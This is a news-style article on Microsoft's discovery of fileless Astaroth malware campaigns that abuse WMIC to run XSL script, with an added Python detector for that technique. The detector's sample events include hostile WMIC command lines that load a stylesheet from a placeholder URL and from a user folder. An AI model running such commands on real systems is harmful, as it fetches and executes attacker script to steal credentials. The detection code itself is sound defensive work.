Microsoft announced today the discovery of many ongoing malware campaigns by the Windows Defender ATP team.
These campaigns distribute the Astaroth malware in a fileless manner, which makes it even more dangerous.
Speaking of malware campaigns, you can nip them in the bud with these antimalware tools.
Here’s how a Microsoft Defender ATP researcher described the attacks:
I was doing a standard review of telemetry when I noticed an anomaly from a detection algorithm designed to catch a specific fileless technique. Telemetry showed a sharp increase in the use of the Windows Management Instrumentation Command-line (WMIC) tool to run a script (a technique that MITRE refers to as XSL Script Processing), indicating a fileless attack.
What is Astaroth and how does it work?
If you didn’t know, Astaroth is a well-known malware focused on stealing sensitive information like credentials and other personal data and sending it back to the attacker.
A very interesting thing is that no files, except system tools, are involved in the attack process. This technique is called living off the land and it’s usually used to evade traditional antivirus solutions, which rely on spotting a malicious file on disk.
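As an added detection example (not code from the original article or from Microsoft), here is a small check over constructed process-creation command lines that flags the WMIC pattern the researcher mentions: a /format: argument that points at a stylesheet on disk or at a URL instead of naming one of WMIC's built-in output formats. The event shape (parent image, command line) is assumed, as is the MITRE ATT&CK identifier T1220 for XSL Script Processing.

```python
import re

# Constructed sample process-creation events (not real telemetry). Each entry is
# (parent_image, command_line). Events 1 and 3 mirror the WMIC XSL Script
# Processing pattern; events 0 and 2 are ordinary WMIC use.
SAMPLE_EVENTS = [
    ("C:\\Windows\\explorer.exe", "wmic.exe os get caption"),
    ("C:\\Windows\\System32\\cmd.exe",
     'wmic.exe process list brief /format:"https://example.invalid/payload.xsl"'),
    ("C:\\Windows\\System32\\cmd.exe", "wmic.exe process list /format:list"),
    ("C:\\Windows\\System32\\cmd.exe",
     'wmic.exe /format:"C:\\Users\\Public\\update.xsl" os get version'),
]

# Image is wmic / wmic.exe, optionally quoted and optionally with a full path.
WMIC_RE = re.compile(r'^(?:"?[^"\s]*\\)?wmic(?:\.exe)?"?\s', re.IGNORECASE)
# /format: followed by an optionally quoted value.
FORMAT_RE = re.compile(r'/format:\s*"?([^"\s]+)"?', re.IGNORECASE)
# A bare name (list, csv, ...) resolves to a built-in stylesheet shipped with
# Windows; a URL, drive path, UNC path or relative path points elsewhere, and
# WMIC will load and run script embedded in that stylesheet.
EXTERNAL_RE = re.compile(r'^(?:[a-z]+://|[a-z]:\\|\\\\|\.{1,2}\\|.*[\\/])',
                         re.IGNORECASE)


def is_xsl_script_abuse(command_line: str) -> bool:
    """True when a WMIC command line loads a stylesheet by URL or explicit path,
    the XSL Script Processing pattern (MITRE ATT&CK T1220, assumed id)."""
    if not WMIC_RE.match(command_line.strip()):
        return False
    m = FORMAT_RE.search(command_line)
    if not m:
        return False
    return bool(EXTERNAL_RE.match(m.group(1)))


def scan(events):
    """Return (index, parent_image) for every event that matches the pattern."""
    return [(i, parent) for i, (parent, cmd) in enumerate(events)
            if is_xsl_script_abuse(cmd)]


if __name__ == "__main__":
    for i, parent in scan(SAMPLE_EVENTS):
        print(f"event {i}: WMIC loading an external stylesheet, parent {parent}")
```

The parent image is kept in the result because, as in the campaign described above, a WMIC launch from an Office process or a script host rather than an administrator's shell is what turns a weak signal into one worth paging on.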
How can I protect my system against this attack?
If you’re an Office 365 user, you’ll be happy to know that:
For this Astaroth campaign, Office 365 Advanced Threat Protection (Office 365 ATP) detects the emails with malicious links that start the infection chain.
As always, for more suggestions or questions, reach for the comments section below.